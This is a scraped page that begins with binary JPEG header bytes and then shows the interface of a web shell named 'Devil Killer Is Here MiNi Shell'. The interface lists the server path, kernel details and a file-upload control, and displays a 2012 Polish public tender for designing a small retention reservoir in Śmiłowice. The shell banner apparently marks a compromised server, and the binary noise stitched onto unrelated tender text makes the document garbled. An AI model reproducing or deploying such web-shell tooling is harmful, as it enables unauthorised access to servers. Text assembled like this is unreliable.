JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120920/357870-N-2012.html

<p class="kh_header"><b>Włocławek: Budowa zbiornika wodnego małej retencji w Śmiłowicach gmina Choceń, powiat włocławski, województwo kujawsko-pomorskie opracowanie koncepcji programowo - przestrzennej,  dokumentacji projektowej oraz pełnienie nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 357870 - 2012; data zamieszczenia: 20.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorski Zarząd Melioracji i Urządzeń Wodnych , ul. Okrzei 74a, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 2302000, faks 054 2302030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zbiornika wodnego małej retencji w Śmiłowicach gmina Choceń, powiat włocławski, województwo kujawsko-pomorskie opracowanie koncepcji programowo - przestrzennej,  dokumentacji projektowej oraz pełnienie nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie koncepcji programowo-przestrzennej (w etapie I) i dokumentacji projektowej  (w etapie II) dla zadania pod nazwą Budowa zbiornika wodnego małej retencji w Śmiłowicach, gmina Choceń, powiat włocławski,  województwo kujawsko-pomorskie oraz pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych  na podstawie dokumentacji dla zadania Budowa zbiornika wodnego małej retencji w Śmiłowicach, gmina Choceń, powiat włocławski,  województwo kujawsko-pomorskie
Szczegółowy opis przedmiotu zamówienia.
Poprzez budowę zbiornika retencyjnego zamierza się osiągnąć główne założenia Programu Rozwoju Małej Retencji, tj. odtworzenia piętrzeń na rzekach i zwiększenia dyspozycyjnych zasobów wód powierzchniowych zlewni, a także warunki Programu Rozwoju Obszarów wiejskich tj.  zwiększenie zasobów wód powierzchniowych i retencji glebowej oraz wyrównanie i spowolnienie spływu wód opadowych. Do głównych funkcji użytkowych zbiornika zaliczyć można:  zwiększenie możliwości wykorzystania wód do nawodnień, retencjonowania wód powierzchniowych, zwiększenie bioróżnorodności siedliskowej w zlewni. Planowane jest wykonanie zbiornika z wykorzystaniem dofinansowania ze środków unijnych w kontekście założeń Programu Rozwoju Obszarów Wiejskich na lata 2007-2013, działanie:  Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez gospodarowanie rolniczymi zasobami wodnymi, Zadanie: Retencja małych zbiorników wodnych na terenach wiejskich.
Zlewnia Lubieńki (do profilu w Śmiłowicach) posiada charakter typowo rolniczy - grunty orne są dominującą formą użytkowania, łąki i pastwiska oraz lasy zajmują kilka procent powierzchni. Powierzchnia zlewni do przekroju zamykającego planowany zbiornik wynosi około 94 km2. Rzeka Lubieńka o całkowitej długości 43 km jest ciekiem III rzędu, wypływa z mokradeł, leżących na wschód od Jeziora Lubieńskiego. Projektowane przegrodzenie doliny i koryta cieku w Śmiłowicach zlokalizowane jest około 18 km od ujścia Lubieńki do Zgłowiączki. Kształt zlewni jest wydłużony. Budowa geologiczna i rzeźba terenu utrudniają spływy powierzchniowe. Wody z terenów przyległych (w dolinie) głównie odprowadzane są systemami melioracyjnymi. W miejscu planowanego zbiornika retencyjnego występuje naturalne zaniżenie terenowe w którym okresowo gromadzi się woda. 
Wstępne rozpoznanie w sprawie przydatności terenu w dolinie Lubieńki dla budowy zbiornika wodnego w Śmiłowicach zawarł zespół pracowników z Polskiej Akademii Nauk, Instytut Geografii i Przestrzennego Zagospodarowania im. St. Leszyckiego, Zakład Zasobów Środowiska i Geozagrożeń z Torunia  w materiale pn. Realizacja zbiornika małej retencji wodnej na rzece Lubieńka w miejscowości Śmiłowice - z 30. listopada 2011 r. (materiały stanowią załącznik nr 8 do specyfikacji). Na podstawie tego opracowania, swoje uwagi do tematu, Regionalny Dyrektor Ochrony Środowiska w Bydgoszczy przedstawił w piśmie WPN.73.18.2012.SD z dnia 7. marca 2012 r. (materiały stanowią załącznik nr 9 do specyfikacji).
Planuje się dwuetapowy tok sporządzenia dokumentacji projektowej. Etap I - opracowanie koncepcji programowo-przestrzennej zakończonej uzyskaniem decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji, etap II - opracowanie dokumentacji technicznej budowy zbiornika wraz z uzyskaniem wymaganych decyzji administracyjnych i innych dokumentów formalno-prawnych niezbędnych do realizacji inwestycji.
 Etap I - koncepcja programowo-przestrzenna budowy zbiornika małej retencji w Śmiłowicach minimum w dwóch  wariantach                                                                                                    Opracowanie winno zawierać między innymi:
1. Charakterystykę gospodarczą terenu przewidzianego pod zbiornik
2. Charakterystykę przyrodniczo-hydrologiczną i zagospodarowania rozpatrywanego terenu
a. Opis zlewni pod względem hydrograficznym.
b. Hydrologię zlewni w zakresie niezbędnym do zaprojektowania zbiornika retencyjnego i budowli piętrzącej.
c. Badania geotechniczne niezbędne dla przyjęcia projektowanych rozwiązań. 
d. Użytkowanie gruntów na terenie przewidzianym pod zbiornik.
e. Ustalenia dotyczące istniejącej i planowanej gospodarki wodnej.
f. Stan infrastruktury technicznej i melioracyjnej w obrębie przewidywanej inwestycji.
g. Omówienie zjawisk przyrodniczych, mających wpływ na rozwiązania techniczne związane z planowaną budową.
h. Inne urządzenia występujące na rozpatrywanym terenie. 
i. Określenie przepływu biologicznego i zasobów dyspozycyjnych wód do celów gospodarczych.
3. Wykonanie pomiarów geodezyjnych (profil podłużny, przekroje dolinowe w miejscach charakterystycznych co ok. 0,2 km) w zakresie niezbędnym do opracowania koncepcji, budowli piętrzącej, zbiornika retencyjnego. 
4. Określenie parametrów technicznych zbiornika (powierzchnia, rzędne piętrzenia) z uwzględnieniem zasobów wodnych (dyspozycyjnych) Lubieńki (w szczególności napełnienie zbiornika w latach optymalnych i suchych), a także z uwzględnienie wpływu na infrastrukturę przyległą ; zabudowania , drogi i.t.p.  
5. Analizę parametrów hydraulicznych koryta cieku poniżej zbiornika (awaria budowli piętrzących zbiornika)
6. Analizę możliwości zapewnienia migracji ryb dwuśrodowiskowych
7. Omówienie kwestii wykonania zbiornika w aspekcie Ramowej Dyrektywy Wodnej - ocena wpływu przedsięwzięcia na biologiczne, hydro-morfologiczne oraz fizyko-chemiczne elementy stanu wód właściwe do osiągnięcia zidentyfikowanych celów środowiskowych jednolitych części wód 
8. Informację o rozwiązaniach projektowych zapewniających ochronę środowiska naturalnego
9. Badania fizyko-chemiczne urobku (z czaszy zbiornika) z określeniem ilości i możliwości utylizacji lub innego wykorzystania
10. Analizę oddziaływania zbiornika na tereny przyległe, wraz z zabezpieczeniem terenów przyległych przed ujemnym oddziaływaniem i związane z tym skutki techniczne i ekonomiczne, uwzględniając wariantowe, optymalne poziomy piętrzenia wody w zbiorniku
11. Koncepcja rozwiązań technicznych planowanego zbiornika
a. Rozwiązania techniczne w zakresie czaszy zbiornika
b. Rozwiązania techniczne w zakresie budowli (budowle piętrzące,roboty ziemne, itp.)
c. Potrzeba przebudowy obiektów infrastruktury technicznej, itp.
d. Technologia wykonania zbiornika (w szczególności w aspekcie usunięcia gruntów z czaszy, sposób wykorzystania i zagospodarowania urobku)
12. Wskazania w zakresie stanu własności gruntów objętych planowaną inwestycją i możliwości ich pozyskania na cele budowy, uzgodnienia z właścicielami.
13. Wskazania dotyczące potrzeb wykonania dokumentacji o charakterze formalnoprawnym, koniecznych do realizacji planowanego zbiornika
14. Dokonanie analizy techniczno-ekonomicznej i przyrodniczej zasadności budowy zbiornika, jak również osiągnięcia zakładanych efektów inwestycji
15. Oszacowanie kosztów realizacji planowanej inwestycji  (z rozbiciem na elementy składowe) - rachunek ekonomiczny zadania inwestycyjnego
16. Uzyskanie decyzji o środowiskowych uwarunkowaniach (w tym odpowiednie materiały do wniosku oraz raport oddziaływania na środowisko - gdy wystąpi potrzeba jego sporządzenia)
17. Inne materiały istotne dla przedmiotu opracowania
18. Wariantowe opracowanie koncepcji (minimum w 2 wariantach) z wyborem wariantu przez   Zamawiającego i zainteresowany samorząd gminy.
Etap II - projekt techniczny budowy zbiornika małej retencji wraz z budowlą piętrzącą w Śmiłowicach
W ramach opracowania należy między innymi:
1. Pomiar sytuacyjno-wysokościowy terenu zajętego pod zbiornik wraz z obszarem będącym pod jego wpływem (1:1000 z warstwicami)
2. Sporządzić mapę zlewni w skali 1:25 000,
3. Sporządzić mapy sytuacyjno-wysokościowe, niezbędne do uzyskania pozwoleń formalno-prawnych, w tym decyzji lokalizacyjnej, pozwolenia wodnoprawnego, pozwolenia na budowę, itp.
4. Sporządzić wypisy działek inwestycji i gruntów przyległych do inwestycji,
5. Przygotować materiały do decyzji o lokalizacji inwestycji celu publicznego i uzyskanie decyzji w  terminie czterech miesięcy od dnia rozpoczęcia realizacji II etapu umowy,
6. Przygotować materiały do decyzji pozwolenia wodnoprawnego i uzyskanie decyzji.
7. Przygotować materiały do wniosku i uzyskać stosowne pozwolenia na prowadzenie robót, badań itp. w zakresie ochrony dóbr kultury w związku z ustawą 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U. nr 162, poz. 1568 z późn. zm.) - w przypadku, gdy wystąpi taka potrzeba
8. Badania geotechniczne gruntu  w zakresie niezbędnym do wykonania zamówienia,
9. Przygotować materiały geodezyjne, tj. projekt rozgraniczenia gruntów pod potrzeby planowanej inwestycji wraz z operatem wywłaszczeniowym uzgodnionym z użytkownikami, w celu uregulowania stanu prawnego własności gruntów. 
10. Uzgodnić z wszystkimi użytkownikami gruntów czasowego zajęcia gruntu (oświadczenia na czas budowy). 
11. Uzyskać od gestorów obiektów i urządzeń infrastruktury technicznej wymagane uzgodnienia, wynikające z zakresu opracowania, 
12. Sporządzić operat dendrologiczny na wycinkę drzew i krzaków, gdy wystąpi potrzeba ich usunięcia,
13. Sporządzić operat geodezyjny w zakresie zajęcia nieruchomości pod potrzeby inwestycji z wydzieleniem działek
14. Opracować instrukcję gospodarowania wodą  utrzymania i eksploatacji zbiornika,
15. Opracować instrukcję gospodarowania wodą w zlewni rzeki Lubienki 
16. Sporządzić ocenę merytoryczną i efektywności inwestycji z podaniem efektów,
17. Opracować specyfikację techniczną wykonania i odbioru robót,
18. Opracować informację dotyczącą bezpieczeństwa i ochrony zdrowia,
19. Sporządzić przedmiar robót i kosztorys inwestorski w 3 egz. zgodnie przepisami rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie  określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym.
Do opracowywania dokumentacji technicznej, objętej etapem II, można będzie przystąpić po zrealizowaniu etapu I zamówienia, wyborze przez Zamawiającego wariantu wykonania inwestycji i uzyskaniu przez Wykonawcę prawomocnej decyzji o środowiskowych uwarunkowaniach.
W ramach opracowania należy przekazać:
a) dla etapu I - koncepcja programowo-przestrzenna budowy zbiornika małej retencji w Śmiłowicach
- 4 egzemplarze koncepcji programowo-przestrzennej
- 4 egzemplarze raportu oddziaływania na środowisko (gdy wystąpi potrzeba opracowania),
- wymaganą decyzję
b) dla etapu II - projekt techniczny budowy zbiornika małej retencji w Śmiłowicach
- 6 egzemplarzy projektu budowlanego
- 6 egzemplarze projektu wykonawczego
- 3 egzemplarze operatu dendrologicznego
- 4 egzemplarze operatu wodnoprawnego,
- 3 egzemplarze wstępnego operatu wywłaszczeniowego,
- 4 egzemplarze instrukcji eksploatacji zbiornika,
- 3 egzemplarze specyfikacji technicznej wykonania i odbioru robót budowlanych,
- 3 egzemplarze instrukcji eksploatacji i konserwacji,
- 3 egzemplarze kosztorysu inwestorskiego, 
- 3 egzemplarze przedmiaru robót ,
- 3 egzemplarze oceny efektywności inwestycji,
- po 3 egzemplarze innych opracowań, których potrzeba sporządzenia wyniknie w procesie projektowania.
- wymagane decyzje
Zobowiązuje się projektanta do uczestnictwa w rozprawie  wodnoprawnej.
Pełną dokumentację techniczną oraz koncepcję programowo - przestrzenną, Wykonawca przekaże  w formie zapisu elektronicznego  (płyta CD), umożliwiającego edycję dostarczonych danych:
część opisowa w postaci plików, które otwarte mogą zostać w edytorach tekstowych i arkuszach kalkulacyjnych (np.: .doc, .odt, .xls, .ods, .docx, .xlsx),
część graficzna w postaci plików zgodnych z formatami powszechnie stosownymi (np.: .dwg),
część mapowa - cyfrowa mapa sytuacyjno-wysokościowa wraz z naniesionymi projektowymi urządzeniami w postaci plików zgodnych z powszechnie stosowanymi formatami (np.: .shp, .gml, .gpx, .dxf).
Pełną dokumentację techniczną wraz z koncepcją programowo - przestrzenną (z wymaganymi pieczęciami organów administracyjnych, z podpisami wykonawców, sprawdzających, itp.) Wykonawca przekaże również w formie zapisu elektronicznego - na płycie CD w formacie pdf.). 
Dokumentację Wykonawca winien wykonać wraz z załącznikami specjalistycznymi zgodnie z wymogami ustaw: z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2010 r. Nr 243, poz. 1623, z późn. zm.), z dnia 18 lipca 2001 r., Prawo wodne (Dz.U. z 2005 r. Nr 239, poz. 2019, z późn. zm.), z dnia 17 maja 1989 r., Prawo geodezyjne i kartograficzne (Dz.U. Z 2010, Nr 193, poz 1287, z późn. zm.),  z dnia 27 kwietnia 2001 r., Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150, z późn. zm.) i z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227, z późn. zm.) oraz rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004 r. Nr 202, poz. 2072, z późn. zm.), rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130 poz. 1389, z późn. zm.), oraz rozporządzenia Rady Ministrów z dnia 9 listopada 2010r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. z 2010r. Nr 213, poz. 1397).
Przedmiot zamówienia obejmuje również pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych  na podstawie dokumentacji zgodnie z postanowieniem art. 20 ust. 1 pkt 4 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2010 r. Nr 243, poz. 1623 z  późn. zm.)  w zakresie stwierdzania w toku wykonywania robót budowlanych zgodności realizacji z projektem, uzgadniania możliwości wprowadzania rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego, udziału w komisjach i naradach technicznych.
Wykonawca zobowiązany będzie do wizytowania placu budowy przez cały czas jej trwania na wezwanie zamawiającego. W ramach pełnienia nadzoru autorskiego przewiduje do 8 wizyt na placu budowy. Potwierdzeniem wykonania przedmiotowego nadzoru będą wpisy do dziennika budowy i karty nadzoru autorskiego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia, do dnia 02.10.2012r. do godz. 10:00 , wadium  w wysokości 5.000,00zł (słownie pięć tysięcy złotych 00/100). Wadium wnosi się przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
- złoży wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
- wykonał, usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej  jedną usługę potwierdzającą, że wykonawca spełnia warunki wiedzy i doświadczenia w zakresie niniejszego przedmiotu zamówienia (tj. Koncepcja lub projekt budowlany unormowania gospodarki wodnej w zakresie melioracji szczegółowej lub podstawowej);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
- złoży wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
- dysponuje osobami posiadającymi wymagane uprawnienia, wynikające z postanowień ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz.U. z 2010 r. nr 243, poz. 1623, z późn. zm.), do projektowania w specjalności właściwej do realizacji przedmiotu zamówienia (wymagana min. 2 osoby z 5 letnim doświadczeniem),
Uwaga: Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, w zakresie którego właściwy organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych  w państwach członkowskich Unii Europejskiej (Dz.U. z 2008r. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez wykonawcę, jeżeli:
- złoży wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
